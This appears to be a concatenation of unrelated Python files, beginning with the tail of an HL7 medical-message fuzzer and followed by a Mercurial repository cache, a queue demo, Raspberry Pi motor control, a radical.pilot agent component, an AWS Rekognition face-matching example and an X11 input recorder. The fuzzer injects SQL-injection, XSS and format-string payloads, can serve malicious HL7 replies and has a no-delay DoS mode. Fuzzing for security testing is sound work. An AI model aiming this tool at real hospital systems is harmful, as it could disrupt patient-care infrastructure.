print(f"{'-' * 40}Q-size[{self.fq.qsize()}]\nSent:\n{send_hl7}\n++++++++++++++++++++++\nRecevied:\n{recv_reply}")
else:
print(f"{'-' * 40}Q-size[{self.fq.qsize()}]\nRecevied:\n{recv_reply}")
try:
_insert = _table.insert().values(sent=send_hl7, recv=recv_reply)
dbconnect.execute(_insert.execution_options(autocommit=True))
except Exception as e:
print("failed to insert into DB")
sleep(self.cmdargs.delay)
dbconnect.close()
self.sock.close()
print("Finishing up, Exiting in 10 seconds...")
return
def new_hl7_client(self,clientS, addr):
dbobj, _table = self.dbSRhl7()
dbconnect = dbobj.connect()
while True:
self.fmtstr = [b"%n" * randrange(1, self.cmdargs.max), b"%c" * randrange(1, self.cmdargs.max),
b"%s" * randrange(1, self.cmdargs.max), b"%p" * randrange(1, self.cmdargs.max),
b"%d" * randrange(1, self.cmdargs.max)]
self.sqli = [i for i in open('payloads/sqli.txt', 'rb').readlines()]
self.xss = [i for i in open('payloads/xss.txt', 'rb').readlines()]
self.elements = [b'^' * randrange(1, self.cmdargs.max), b'\\' * randrange(1, self.cmdargs.max),
b'&' * randrange(1, self.cmdargs.max), b'~' * randrange(1, self.cmdargs.max)]
self.strats = [b"A" * randrange(1, self.cmdargs.max), urandom(randrange(1, self.cmdargs.max)),
choice(self.elements), choice(self.sqli), choice(self.xss),
choice(self.fmtstr), choice(self.badstrings)]
try:
try:
msg = clientS.recv(1024)
print(addr, ' >> ', msg)
except:
break
if not msg:
break
send_hl7 = self.header+choice(self.strats)+self.tail if self.cmdargs.servermode == 0 else choice(self.strats)
print(f"\n\n{send_hl7}\n\n---------------------------")
clientS.send(send_hl7)
try:
_insert = _table.insert().values(sent=send_hl7, recv=msg)
dbconnect.execute(_insert.execution_options(autocommit=True))
except Exception as e:
print("failed to insert into DB")
except KeyboardInterrupt:
break
clientS.close()
def hl7server(self):
s = socket.socket()
s.bind(('',self.cmdargs.serverport))
s.listen(5)
while True:
try:
c, addr = s.accept()
_thread.start_new_thread(self.new_hl7_client, (c, addr))
except KeyboardInterrupt:
break
s.close()
exit()
if __name__ == '__main__':
cmdopts = argparse.ArgumentParser(description='An extremely dumb HL7 message fuzzer.')
cmdopts.add_argument("-f", "--folder", help="Folder containing a hl7 messages as text files.", default="messages")
cmdopts.add_argument("-d", "--ip", help="Destination Ip address.", required=False)
cmdopts.add_argument("-p", "--port", help="Destination port.", required=False, type=int)
cmdopts.add_argument("-s", "--samples", help="Number of samples to generate.", required=False, type=int, default=3000)
cmdopts.add_argument("-c", "--change", help="Fields to always change.", required=False)
cmdopts.add_argument("-m", "--max", type=int, help="Max length of fuzz generated string.", required=False, default=10)
cmdopts.add_argument("-t", "--target", help="Will change from random fuzz payload insertion into messages to defined areas that you selected from a message which are defined by a delimiter of your choice.", required=False)
cmdopts.add_argument("-a", "--allparts", help="This will allow you to parse the first segment of an HL7 message instead of skipping the first segment.", required=False, type=int ,default=0)
cmdopts.add_argument("-v", "--noisey",help="to show both sent and received messages set this to 1",required=False, type=int, default=0)
cmdopts.add_argument("-x", "--delay", help="delay interval between sending packets. Set this to 0 for DoS attack/stress testing.", required=False,type=int, default=1)
cmdopts.add_argument("-b","--server",help="Setup a server to respond with malicious HL7 messages.",required=False , default=0)
cmdopts.add_argument("-bp", "--serverport", help="Setup the server port respond with malicious HL7 messages.",required=False, type=int)
cmdopts.add_argument("-bm", "--servermode", help="Setup the server to respond with malicious (generic or HL7) messages.", required=False, type=int)
cmdopts.add_argument("-cm", "--clientmode", help="Setup the client to respond with malicious (generic or HL7) messages.", required=False, type=int)
cmdargs = cmdopts.parse_args()
hl7f = hl7fuzz(cmdargs)
|
repocache.py | # repocache.py - in-memory repository cache for long-running services
#
# Copyright 2018 Yuya Nishihara <yuya@tcha.org>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import
import collections
import gc
import threading
from . import (
error,
hg,
obsolete,
scmutil,
util,
)
class repoloader(object):
"""Load repositories in background thread
This is designed for a forking server. A cached repo cannot be obtained
until the server fork()s a worker and the loader thread stops.
"""
def __init__(self, ui, maxlen):
self._ui = ui.copy()
self._cache = util.lrucachedict(max=maxlen)
# use deque and Event instead of Queue since deque can discard
# old items to keep at most maxlen items.
self._inqueue = collections.deque(maxlen=maxlen)
self._accepting = False
self._newentry = threading.Event()
self._thread = None
def start(self):
assert not self._thread
if self._inqueue.maxlen == 0:
# no need to spawn loader thread as the cache is disabled
return
self._accepting = True
self._thread = threading.Thread(target=self._mainloop)
self._thread.start()
def stop(self):
if not self._thread:
return
self._accepting = False
self._newentry.set()
self._thread.join()
self._thread = None
self._cache.clear()
self._inqueue.clear()
def load(self, path):
"""Request to load the specified repository in background"""
self._inqueue.append(path)
self._newentry.set()
def get(self, path):
"""Return a cached repo if available
This function must be called after fork(), where the loader thread
is stopped. Otherwise, the returned repo might be updated by the
loader thread.
"""
if self._thread and self._thread.is_alive():
raise error.ProgrammingError(
b'cannot obtain cached repo while loader is active'
)
return self._cache.peek(path, None)
def _mainloop(self):
while self._accepting:
# Avoid heavy GC after fork(), which would cancel the benefit of
# COW. We assume that GIL is acquired while GC is underway in the
# loader thread. If that isn't true, we might have to move
# gc.collect() to the main thread so that fork() would never stop
# the thread where GC is in progress.
gc.collect()
self._newentry.wait()
while self._accepting:
self._newentry.clear()
try:
path = self._inqueue.popleft()
except IndexError:
break
scmutil.callcatch(self._ui, lambda: self._load(path))
def _load(self, path):
start = util.timer()
# TODO: repo should be recreated if storage configuration changed
try:
# pop before loading so inconsistent state wouldn't be exposed
repo = self._cache.pop(path)
except KeyError:
repo = hg.repository(self._ui, path).unfiltered()
_warmupcache(repo)
repo.ui.log(
b'repocache',
b'loaded repo into cache: %s (in %.3fs)\n',
path,
util.timer() - start,
)
self._cache.insert(path, repo)
# TODO: think about proper API of preloading cache
def _warmupcache(repo):
repo.invalidateall()
repo.changelog
repo.obsstore._all
repo.obsstore.successors
repo.obsstore.predecessors
repo.obsstore.children
for name in obsolete.cachefuncs:
obsolete.getrevs(repo, name)
repo._phasecache.loadphaserevs(repo)
# TODO: think about proper API of attaching preloaded attributes
def copycache(srcrepo, destrepo):
"""Copy cached attributes from srcrepo to destrepo"""
destfilecache = destrepo._filecache
srcfilecache = srcrepo._filecache
if b'changelog' in srcfilecache:
destfilecache[b'changelog'] = ce = srcfilecache[b'changelog']
ce.obj.opener = ce.obj._realopener = destrepo.svfs
if b'obsstore' in srcfilecache:
destfilecache[b'obsstore'] = ce = srcfilecache[b'obsstore']
ce.obj.svfs = destrepo.svfs
if b'_phasecache' in srcfilecache:
destfilecache[b'_phasecache'] = ce = srcfilecache[b'_phasecache']
ce.obj.opener = destrepo.svfs
|
04_queue1.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from multiprocessing import Queue, Process
import time, random
def write(q):
if not q.full():
for value in ["a", "b", "c", "d"]:
print("向队列中添加消息 %s" % value)
q.put(value)
time.sleep(random.random())
def read(q):
while True:
if not q.empty():
for i in range(q.qsize()):
print(q.get())
time.sleep(random.random())
else:
break
if __name__ == "__main__":
q = Queue()
p1 = Process(target=write, args=(q,))
p1.start()
p1.join()
p2 = Process(target=read, args=(q,))
p2.start()
p2.join() |
pwm.py | import RPi.GPIO as GPIO
from time import sleep
from threading import Thread
class pwm_control():
def __init__(self):
self.right_pwm_pin = 32 #Select Pin
self.left_pwm_pin = 33
self.right_pwm_en_1 = 11
self.left_pwm_en_1 = 13
self.right_pwm_en_2 = 15
self.left_pwm_en_2 = 16
self.car_direction_right = True
self.car_direction_left = True
self.isBusy = True
self.right_pwm_value = 0
self.left_pwm_value = 0
self.isClose = 0
GPIO.setwarnings(False) #GPIO PIN Setup
GPIO.setmode(GPIO.BOARD)
GPIO.setup(self.right_pwm_pin,GPIO.OUT)
GPIO.setup(self.left_pwm_pin,GPIO.OUT)
GPIO.setup(self.right_pwm_en_1,GPIO.OUT)
GPIO.setup(self.left_pwm_en_1,GPIO.OUT)
GPIO.setup(self.right_pwm_en_2,GPIO.OUT)
GPIO.setup(self.left_pwm_en_2,GPIO.OUT)
self.right_pwm = GPIO.PWM(self.right_pwm_pin,1000) #Right PWM Setup
self.right_pwm.start(0)
self.left_pwm = GPIO.PWM(self.left_pwm_pin,1000) #Left PWM Setup
self.left_pwm.start(0)
def right_pwm_control(self): #Thread for Right PWM
while self.isBusy:
self.direction_right()
self.right_pwm.ChangeDutyCycle(self.pwm_value_control(self.right_pwm_value))
#print("Sağ "+str(self.pwm_value_control(self.right_pwm_value)))
sleep(0.1)
self.close_check()
def left_pwm_control(self): #Thread for Left PWM
while self.isBusy:
self.direction_left()
self.left_pwm.ChangeDutyCycle(self.pwm_value_control(self.left_pwm_value))
#print("Sol "+str(self.pwm_value_control(self.left_pwm_value)))
sleep(0.1)
self.close_check()
def pwm_value_control(self,pwm_value): #Control PWM value for unexpected situations
if pwm_value < 0:
pwm_value = 0
elif pwm_value > 100:
pwm_value = 100
return pwm_value
def direction_right(self):
if self.car_direction_right == True:
GPIO.output(self.right_pwm_en_1,GPIO.HIGH)
GPIO.output(self.right_pwm_en_2,GPIO.LOW)
#print("Sağ ileri")
pass
else:
GPIO.output(self.right_pwm_en_1,GPIO.LOW)
GPIO.output(self.right_pwm_en_2,GPIO.HIGH)
#print("Sağ geri")
pass
def direction_left(self):
if self.car_direction_left == True:
GPIO.output(self.left_pwm_en_1,GPIO.HIGH)
GPIO.output(self.left_pwm_en_2,GPIO.LOW)
#print("Sol ileri")
pass
else:
GPIO.output(self.left_pwm_en_1,GPIO.LOW)
GPIO.output(self.left_pwm_en_2,GPIO.HIGH)
#print("Sol geri")
pass
def close_check(self):
self.isClose = self.isClose + 1
if(self.isClose==2):
GPIO.cleanup()
print("Closed")
def run(self): #Run Threads
Thread(target=self.right_pwm_control).start()
Thread(target=self.left_pwm_control).start()
|
funcs.py |
__copyright__ = "Copyright 2013-2016, http://radical.rutgers.edu"
__license__ = "MIT"
import os
import copy
import stat
import time
import Queue
import signal
import tempfile
import threading
import traceback
import subprocess
import radical.utils as ru
from .... import pilot as rp
from ... import utils as rpu
from ... import states as rps
from ... import constants as rpc
from .base import AgentExecutingComponent
# ==============================================================================
#
class FUNCS(AgentExecutingComponent) :
# --------------------------------------------------------------------------
#
def __init__(self, cfg, session):
AgentExecutingComponent.__init__ (self, cfg, session)
self._collector = None
self._terminate = threading.Event()
# --------------------------------------------------------------------------
#
def initialize_child(self):
self._pwd = os.getcwd()
self.gtod = "%s/gtod" % self._pwd
self.register_input(rps.AGENT_EXECUTING_PENDING,
rpc.AGENT_EXECUTING_QUEUE, self.work)
self.register_output(rps.AGENT_STAGING_OUTPUT_PENDING,
rpc.AGENT_STAGING_OUTPUT_QUEUE)
self.register_publisher (rpc.AGENT_UNSCHEDULE_PUBSUB)
self.register_subscriber(rpc.CONTROL_PUBSUB, self.command_cb)
addr_wrk = self._cfg['bridges']['funcs_wrk_queue']
addr_res = self._cfg['bridges']['funcs_res_queue']
self._log.debug('=== wrk in addr: %s', addr_wrk['addr_in' ])
self._log.debug('=== res out addr: %s', addr_res['addr_out'])
self._funcs_wrk = rpu.Queue(self._session, 'funcs_wrk_queue',
rpu.QUEUE_INPUT, self._cfg,
addr_wrk['addr_in'])
self._funcs_res = rpu.Queue(self._session, 'funcs_res_queue',
rpu.QUEUE_OUTPUT, self._cfg,
addr_res['addr_out'])
self._cancel_lock = threading.RLock()
self._cus_to_cancel = list()
self._cus_to_watch = list()
self._watch_queue = Queue.Queue ()
self._pilot_id = self._cfg['pilot_id']
# run watcher thread
self._collector = ru.Thread(target=self._collect, name="Collector")
self._collector.start()
# we need to launch the executors on all nodes, and use the
# agent_launcher for that
self._launcher = rp.agent.LM.create(
name = self._cfg.get('agent_launch_method'),
cfg = self._cfg,
session = self._session)
# now run the func launcher on all nodes
ve = os.environ.get('VIRTUAL_ENV', '')
exe = ru.which('radical-pilot-agent-funcs')
if not exe:
exe = '%s/rp_install/bin/radical-pilot-agent-funcs' % self._pwd
for idx, node in enumerate(self._cfg['lrms_info']['node_list']):
uid = 'func_exec.%04d' % idx
pwd = '%s/%s' % (self._pwd, uid)
funcs = {'uid' : uid,
'description': {'executable' : exe,
'arguments' : [pwd, ve],
'cpu_processes': 1,
'environment' : [],
},
'slots' : {'nodes' : [{'name' : node[0],
'uid' : node[1],
'cores' : [[0]],
'gpus' : []
}]
},
'cfg' : {'addr_wrk' : addr_wrk['addr_out'],
'addr_res' : addr_res['addr_in']
}
}
self._spawn(self._launcher, funcs)
# --------------------------------------------------------------------------
#
def command_cb(self, topic, msg):
self._log.info('command_cb [%s]: %s', topic, msg)
cmd = msg['cmd']
arg = msg['arg']
if cmd == 'cancel_units':
self._log.info("cancel_units command (%s)" % arg)
with self._cancel_lock:
self._cus_to_cancel.extend(arg['uids'])
return True
# --------------------------------------------------------------------------
#
def _spawn(self, launcher, funcs):
# NOTE: see documentation of funcs['sandbox'] semantics in the ComputeUnit
# class definition.
sandbox = '%s/%s' % (self._pwd, funcs['uid'])
fname = '%s/%s.sh' % (sandbox, funcs['uid'])
cfgname = '%s/%s.cfg' % (sandbox, funcs['uid'])
descr = funcs['description']
rpu.rec_makedir(sandbox)
ru.write_json(funcs.get('cfg'), cfgname)
launch_cmd, hop_cmd = launcher.construct_command(funcs, fname)
if hop_cmd : cmdline = hop_cmd
else : cmdline = fname
with open(fname, "w") as fout:
fout.write('#!/bin/sh\n\n')
# Create string for environment variable setting
fout.write('export RP_SESSION_ID="%s"\n' % self._cfg['session_id'])
fout.write('export RP_PILOT_ID="%s"\n' % self._cfg['pilot_id'])
fout.write('export RP_AGENT_ID="%s"\n' % self._cfg['agent_name'])
fout.write('export RP_SPAWNER_ID="%s"\n' % self.uid)
fout.write('export RP_FUNCS_ID="%s"\n' % funcs['uid'])
fout.write('export RP_GTOD="%s"\n' % self.gtod)
fout.write('export RP_TMP="%s"\n' % self._cu_tmp)
# also add any env vars requested in the unit description
if descr.get('environment', []):
for key,val in descr['environment'].iteritems():
fout.write('export "%s=%s"\n' % (key, val))
fout.write('\n%s\n\n' % launch_cmd)
fout.write('RETVAL=$?\n')
fout.write("exit $RETVAL\n")
# done writing to launch script, get it ready for execution.
st = os.stat(fname)
os.chmod(fname, st.st_mode | stat.S_IEXEC)
# prepare stdout/stderr
stdout_file = descr.get('stdout') or 'STDOUT'
stderr_file = descr.get('stderr') or 'STDERR'
fout = open('%s/%s.out' % (sandbox, funcs['uid']), "w")
ferr = open('%s/%s.err' % (sandbox, funcs['uid']), "w")
self._prof.prof('exec_start', uid=funcs['uid'])
funcs['proc'] = subprocess.Popen(args = cmdline,
executable = None,
stdin = None,
stdout = fout,
stderr = ferr,
preexec_fn = os.setsid,
close_fds = True,
shell = True,
cwd = sandbox)
self._prof.prof('exec_ok', uid=funcs['uid'])
# --------------------------------------------------------------------------
#
def work(self, units):
if not isinstance(units, list):
units = [units]
self.advance(units, rps.AGENT_EXECUTING, publish=True, push=False)
for unit in units:
assert(unit['description']['cpu_process_type'] == 'FUNC')
self._funcs_wrk.put(unit)
# --------------------------------------------------------------------------
#
def _collect(self):
while not self._terminate.is_set():
# pull units from "funcs_out_queue"
units = self._funcs_res.get_nowait(1000)
if units:
for unit in units:
unit['target_state'] = unit['state']
unit['pilot'] = self._pilot_id
self._log.debug('=== got %s [%s] [%s] [%s]',
unit['uid'], unit['state'],
unit['stdout'], unit['stderr'])
self.advance(units, rps.AGENT_STAGING_OUTPUT_PENDING,
publish=True, push=True)
else:
time.sleep(0.1)
# ------------------------------------------------------------------------------
|
VidLambdaFaceMatch.py | """
Code and comments derived from:
https://aws.amazon.com/blogs/machine-learning/find-distinct-people-in-a-video-with-amazon-rekognition/
Accessed 2018-09-10
"""
"""
LAMBDA ONE: Processes video into thumbnail frames for AWS Rekognition index_faces command
"""
# Retrieve the key for the S3 object that caused this function to be triggered
key = urllib.unquote_plus(event['Records'][0]['s3']['object']['key'].encode('utf8'))
filename = key.split('/')[-1]
# Create a new transcoding job. Files created by Elastic Transcoder start with 'elastictranscoder/[filename]/[timestamp]_'
timestamp = datetime.utcnow().strftime('%Y-%m-%d_%H-%M-%S')
client = boto3.client('elastictranscoder')
response = client.create_job(
PipelineId=os.environ['PipelineId'],
Input={'Key': key},
OutputKeyPrefix='elastictranscoder/{}/{}_'.format(filename, timestamp),
Output={
'Key': 'transcoded-video.mp4',
'ThumbnailPattern': 'thumbnail-{count}',
'PresetId': os.environ['PresetId']
}
)
"""
LAMBDA TWO: Creates a new collection in Amazon Rekognition.
"""
"""
2.A Calls the IndexFaces operation for each thumbnail. The solution uses concurrent
threads to increase the throughput of requests to Amazon Rekognition and to reduce
the time needed to complete the operation. In the end, the collection contains as
many faces as there are faces detected in each thumbnail.
"""
# Create a new collection. I use the job ID for the name of the collection
collectionId = sns_msg['jobId']
rekognition.create_collection(CollectionId=collectionId)
# Retrieve the list of thumbnail objects in the S3 bucket
thumbnailKeys = []
prefix = sns_msg['outputKeyPrefix']
prefix += sns_msg['outputs'][0]['thumbnailPattern'].replace('{count}', '')
paginator = s3.get_paginator('list_objects')
response_iterator = paginator.paginate(
Bucket=os.environ['Bucket'],
Prefix=prefix
)
for page in response_iterator:
thumbnailKeys += [i['Key'] for i in page['Contents']]
# Call the IndexFaces operation for each thumbnail
faces = {}
indexFacesQueue = Queue()
def index_faces_worker():
rekognition = boto3.client('rekognition', region_name=os.environ['AWS_REGION'])
while True:
key = indexFacesQueue.get()
try:
response = rekognition.index_faces(
CollectionId=collectionId,
Image={'S3Object': {
'Bucket': os.environ['Bucket'],
'Name': key
}},
ExternalImageId=str(frameNumber)
)
# Store information about returned faces in a local variable
frameNumber = int(key[:-4][-5:])
for face in response['FaceRecords']:
faceId = face['Face']['FaceId']
faces[faceId] = {
'FrameNumber': frameNumber,
'BoundingBox': face['Face']['BoundingBox']
}
# Put the key back in the queue if the IndexFaces operation failed
except:
indexFacesQueue.put(key)
indexFacesQueue.task_done()
# Start CONCURRENT_THREADS threads
for i in range(CONCURRENT_THREADS):
t = Thread(target=index_faces_worker)
t.daemon = True
t.start()
# Wait for all thumbnail objects to be processed
for key in thumbnailKeys:
indexFacesQueue.put(key)
indexFacesQueue.join()
"""
2.B For each face stored in the collection, calls the SearchFaces operation to
search for faces that are similar to that face and in which it has a confidence
in the match that is higher than 97%.
"""
searchFacesQueue = Queue()
def search_faces_worker():
rekognition = boto3.client('rekognition', region_name=os.environ['AWS_REGION'])
while True:
faceId = searchFacesQueue.get()
try:
response = rekognition.search_faces(
CollectionId=collectionId,
FaceId=faceId,
FaceMatchThreshold=97,
MaxFaces=256
)
matchingFaces = [i['Face']['FaceId'] for i in response['FaceMatches']]
# Delete the face from the local variable 'faces' if it has no matching faces
if len(matchingFaces) > 0:
faces[faceId]['MatchingFaces'] = matchingFaces
else:
del faces[faceId]
except:
searchFacesQueue.put(faceId)
searchFacesQueue.task_done()
for i in range(CONCURRENT_THREADS):
t = Thread(target=search_faces_worker)
t.daemon = True
t.start()
for faceId in list(faces):
searchFacesQueue.put(faceId)
searchFacesQueue.join()
"""
2.C Find faces in the collection that match each face that it detected. It starts
from the first face that appears in the video and associates that face with a
peopleId of 1. Then, it recursively propagates the peopleId to the matching faces.
In other words, if faceA matches faceB and faceB matches faceC, the function decides
that faceA, faceB and faceC correspond to the same person and assigns them all
the same peopleId. To avoid false positives, the Lambda function propagates the
peopleId from faceA to faceB only if there are at least two faces that match faceB
that also match faceA. When the peopleId 1 has fully propagated, the function associates
a peopleId of 2 to the next face appearing in the video that has no peopleId associated with it.
It continues this process until all of the faces have a peopleId.
"""
# Sort the list of faces in the order of which they appear in the video
def getKey(item):
return item[1]
facesFrameNumber = {k: v['FrameNumber'] for k, v in faces.items()}
faceIdsSorted = [i[0] for i in sorted(facesFrameNumber.items(), key=getKey)]
# Identify unique people and detect the frames in which they appear
def propagate_person_id(faceId):
for matchingId in faces[faceId]['MatchingFaces']:
if not 'PersonId' in faces[matchingId]:
numberMatchingLoops = 0
for matchingId2 in faces[matchingId]['MatchingFaces']:
if faceId in faces[matchingId2]['MatchingFaces']:
numberMatchingLoops = numberMatchingLoops + 1
if numberMatchingLoops >= 2:
personId = faces[faceId]['PersonId']
faces[matchingId]['PersonId'] = personId
propagate_person_id(matchingId)
personId = 0
for faceId in faceIdsSorted:
if not 'PersonId' in faces[faceId]:
personId = personId + 1
faces[faceId]['PersonId'] = personId
propagate_person_id(faceId)
|
linux_recorder.py | from sneakysnek.recorder import Recorder
from sneakysnek.keyboard_keys import KeyboardKey
from sneakysnek.mouse_buttons import MouseButton
from sneakysnek.keyboard_event import KeyboardEvent, KeyboardEvents
from sneakysnek.mouse_event import MouseEvent, MouseEvents
import threading
import Xlib.display
import Xlib.ext
import Xlib.X
import Xlib.XK
import Xlib.protocol.rq
class LinuxRecorder(Recorder):
def __init__(self, callback):
self.callback = callback
self.is_recording = False
self.thread = None
self.display_local = Xlib.display.Display()
self.display_record_keyboard = Xlib.display.Display()
self.display_record_mouse = Xlib.display.Display()
self.keyboard_context = None
self.mouse_context = None
self.keyboard_event_thread = None
self.mouse_event_thread = None
def start(self):
self.is_recording = True
self.keyboard_context = self._initialize_keyboard_context()
self.mouse_context = self._initialize_mouse_context()
self.keyboard_event_thread = threading.Thread(target=self.start_keyboard_recording, args=())
self.keyboard_event_thread.daemon = True
self.keyboard_event_thread.start()
self.mouse_event_thread = threading.Thread(target=self.start_mouse_recording, args=())
self.mouse_event_thread.daemon = True
self.mouse_event_thread.start()
def start_keyboard_recording(self):
self.display_record_keyboard.record_enable_context(
self.keyboard_context,
lambda r: self.event_handler(self.display_record_keyboard, r)
)
self.display_record_keyboard.record_free_context(self.keyboard_context)
def start_mouse_recording(self):
self.display_record_mouse.record_enable_context(
self.mouse_context,
lambda r: self.event_handler(self.display_record_mouse, r)
)
self.display_record_mouse.record_free_context(self.mouse_context)
def stop(self):
self.display_local.record_disable_context(self.keyboard_context)
self.display_local.record_disable_context(self.mouse_context)
self.display_local.flush()
self.display_record_keyboard.close()
self.display_record_mouse.close()
self.display_local.close()
self.is_recording = False
def event_handler(self, display, reply):
data = reply.data
while len(data):
event, data = Xlib.protocol.rq.EventField(None).parse_binary_value(
data,
display.display,
None,
None
)
if event.type in [Xlib.X.KeyPress, Xlib.X.KeyRelease]:
index = self._shift_to_index(self.display_local, event.state)
scan_code = self._keycode_to_scan_code(self.display_local, event.detail, index)
if scan_code in keyboard_scan_code_mapping:
keyboard_key = keyboard_scan_code_mapping[scan_code]
else:
return None
self.callback(KeyboardEvent(KeyboardEvents.DOWN if event.type == Xlib.X.KeyPress else KeyboardEvents.UP, keyboard_key))
elif event.type == Xlib.X.ButtonPress:
if event.detail in mouse_button_mapping:
button = mouse_button_mapping[event.detail]
x = event.root_x
y = event.root_y
self.callback(MouseEvent(MouseEvents.CLICK, button=button, direction="DOWN", x=x, y=y))
elif event.type == Xlib.X.ButtonRelease:
if event.detail in mouse_button_mapping:
button = mouse_button_mapping[event.detail]
x = event.root_x
y = event.root_y
self.callback(MouseEvent(MouseEvents.CLICK, button=button, direction="UP", x=x, y=y))
elif event.detail in [4, 5]:
direction = "UP" if event.detail == 4 else "DOWN"
x = event.root_x
y = event.root_y
self.callback(MouseEvent(MouseEvents.SCROLL, direction=direction, velocity=1, x=x, y=y))
elif event.type == Xlib.X.MotionNotify:
self.callback(MouseEvent(MouseEvents.MOVE, x=event.root_x, y=event.root_y))
def _initialize_keyboard_context(self):
return self.display_record_keyboard.record_create_context(
0,
[Xlib.ext.record.AllClients],
[{
'core_requests': (0, 0),
'core_replies': (0, 0),
'ext_requests': (0, 0, 0, 0),
'ext_replies': (0, 0, 0, 0),
'delivered_events': (0, 0),
'device_events': (
Xlib.X.KeyPress,
Xlib.X.KeyRelease
),
'errors': (0, 0),
'client_started': False,
'client_died': False,
}]
)
def _initialize_mouse_context(self):
return self.display_record_mouse.record_create_context(
0,
[Xlib.ext.record.AllClients],
[{
'core_requests': (0, 0),
'core_replies': (0, 0),
'ext_requests': (0, 0, 0, 0),
'ext_replies': (0, 0, 0, 0),
'delivered_events': (0, 0),
'device_events': (
Xlib.X.ButtonPressMask,
Xlib.X.ButtonReleaseMask
),
'errors': (0, 0),
'client_started': False,
'client_died': False,
}]
)
def _shift_to_index(self, display, shift):
return ((1 if shift & 1 else 0) + (2 if shift & self._alt_gr_mask(display) else 0))
def _alt_gr_mask(self, display):
if not hasattr(display, "__altgr_mask"):
display.__altgr_mask = self._find_mask(display, "Mode_switch")
return display.__altgr_mask
def _find_mask(self, display, symbol):
modifier_keycode = display.keysym_to_keycode(Xlib.XK.string_to_keysym(symbol))
for index, keycodes in enumerate(display.get_modifier_mapping()):
for keycode in keycodes:
if keycode == modifier_keycode:
return 1 << index
return 0
def _keycode_to_scan_code(self, display, keycode, index):
scan_code = display.keycode_to_keysym(keycode, index)
if scan_code:
return scan_code
elif index & 0x2:
return self._keycode_to_scan_code(display, keycode, index & ~0x2)
elif index & 0x1:
return self._keycode_to_scan_code(display, keycode, index & ~0x1)
else:
return 0
@classmethod
def record(cls, callback):
recorder = cls(callback)
recorder.thread = threading.Thread(target=recorder.start, args=())
recorder.thread.daemon = True
recorder.thread.start()
return recorder
keyboard_scan_code_mapping = {
65307: KeyboardKey.KEY_ESCAPE,
65470: KeyboardKey.KEY_F1,
65471: KeyboardKey.KEY_F2,
65472: KeyboardKey.KEY_F3,
65473: KeyboardKey.KEY_F4,
65474: KeyboardKey.KEY_F5,
65475: KeyboardKey.KEY_F6,
65476: KeyboardKey.KEY_F7,
65477: KeyboardKey.KEY_F8,
65478: KeyboardKey.KEY_F9,
65479: KeyboardKey.KEY_F10,
65480: KeyboardKey.KEY_F11,
65481: KeyboardKey.KEY_F12,
65377: KeyboardKey.KEY_PRINT_SCREEN,
65300: KeyboardKey.KEY_SCROLL_LOCK,
65299: KeyboardKey.KEY_PAUSE,
96: KeyboardKey.KEY_GRAVE,
49: KeyboardKey.KEY_1,
50: KeyboardKey.KEY_2,
51: KeyboardKey.KEY_3,
52: KeyboardKey.KEY_4,
53: KeyboardKey.KEY_5,
54: KeyboardKey.KEY_6,
55: KeyboardKey.KEY_7,
56: KeyboardKey.KEY_8,
57: KeyboardKey.KEY_9,
48: KeyboardKey.KEY_0,
45: KeyboardKey.KEY_MINUS,
61: KeyboardKey.KEY_EQUALS,
65288: KeyboardKey.KEY_BACKSPACE,
65379: KeyboardKey.KEY_INSERT,
65360: KeyboardKey.KEY_HOME,
65365: KeyboardKey.KEY_PAGE_UP,
65407: KeyboardKey.KEY_NUMLOCK,
65455: KeyboardKey.KEY_NUMPAD_DIVIDE,
65450: KeyboardKey.KEY_NUMPAD_MULTIPLY,
65453: KeyboardKey.KEY_NUMPAD_SUBTRACT,
65289: KeyboardKey.KEY_TAB,
113: KeyboardKey.KEY_Q,
119: KeyboardKey.KEY_W,
101: KeyboardKey.KEY_E,
114: KeyboardKey.KEY_R,
116: KeyboardKey.KEY_T,
121: KeyboardKey.KEY_Y,
117: KeyboardKey.KEY_U,
105: KeyboardKey.KEY_I,
111: KeyboardKey.KEY_O,
112: KeyboardKey.KEY_P,
91: KeyboardKey.KEY_LEFT_BRACKET,
93: KeyboardKey.KEY_RIGHT_BRACKET,
92: KeyboardKey.KEY_BACKSLASH,
65535: KeyboardKey.KEY_DELETE,
65367: KeyboardKey.KEY_END,
65366: KeyboardKey.KEY_PAGE_DOWN,
65429: KeyboardKey.KEY_NUMPAD_7,
65431: KeyboardKey.KEY_NUMPAD_8,
65434: KeyboardKey.KEY_NUMPAD_9,
65451: KeyboardKey.KEY_NUMPAD_ADD,
65509: KeyboardKey.KEY_CAPSLOCK,
97: KeyboardKey.KEY_A,
115: KeyboardKey.KEY_S,
100: KeyboardKey.KEY_D,
102: KeyboardKey.KEY_F,
103: KeyboardKey.KEY_G,
104: KeyboardKey.KEY_H,
106: KeyboardKey.KEY_J,
107: KeyboardKey.KEY_K,
108: KeyboardKey.KEY_L,
59: KeyboardKey.KEY_SEMICOLON,
39: KeyboardKey.KEY_APOSTROPHE,
65293: KeyboardKey.KEY_RETURN,
65430: KeyboardKey.KEY_NUMPAD_4,
65437: KeyboardKey.KEY_NUMPAD_5,
65432: KeyboardKey.KEY_NUMPAD_6,
65505: KeyboardKey.KEY_LEFT_SHIFT,
122: KeyboardKey.KEY_Z,
120: KeyboardKey.KEY_X,
99: KeyboardKey.KEY_C,
118: KeyboardKey.KEY_V,
98: KeyboardKey.KEY_B,
110: KeyboardKey.KEY_N,
109: KeyboardKey.KEY_M,
44: KeyboardKey.KEY_COMMA,
46: KeyboardKey.KEY_PERIOD,
47: KeyboardKey.KEY_SLASH,
65506: KeyboardKey.KEY_RIGHT_SHIFT,
65362: KeyboardKey.KEY_UP,
65436: KeyboardKey.KEY_NUMPAD_1,
65433: KeyboardKey.KEY_NUMPAD_2,
65435: KeyboardKey.KEY_NUMPAD_3,
65421: KeyboardKey.KEY_NUMPAD_RETURN,
65507: KeyboardKey.KEY_LEFT_CTRL,
65513: KeyboardKey.KEY_LEFT_ALT,
32: KeyboardKey.KEY_SPACE,
65514: KeyboardKey.KEY_RIGHT_ALT,
65508: KeyboardKey.KEY_RIGHT_CTRL,
65361: KeyboardKey.KEY_LEFT,
65364: KeyboardKey.KEY_DOWN,
65363: KeyboardKey.KEY_RIGHT,
65438: KeyboardKey.KEY_NUMPAD_0,
65439: KeyboardKey.KEY_NUMPAD_PERIOD,
65515: KeyboardKey.KEY_LEFT_WINDOWS,
65516: KeyboardKey.KEY_RIGHT_WINDOWS
}
mouse_button_mapping = {
1 : MouseButton.LEFT,
2 : MouseButton.MIDDLE,
3 : MouseButton.RIGHT
} |
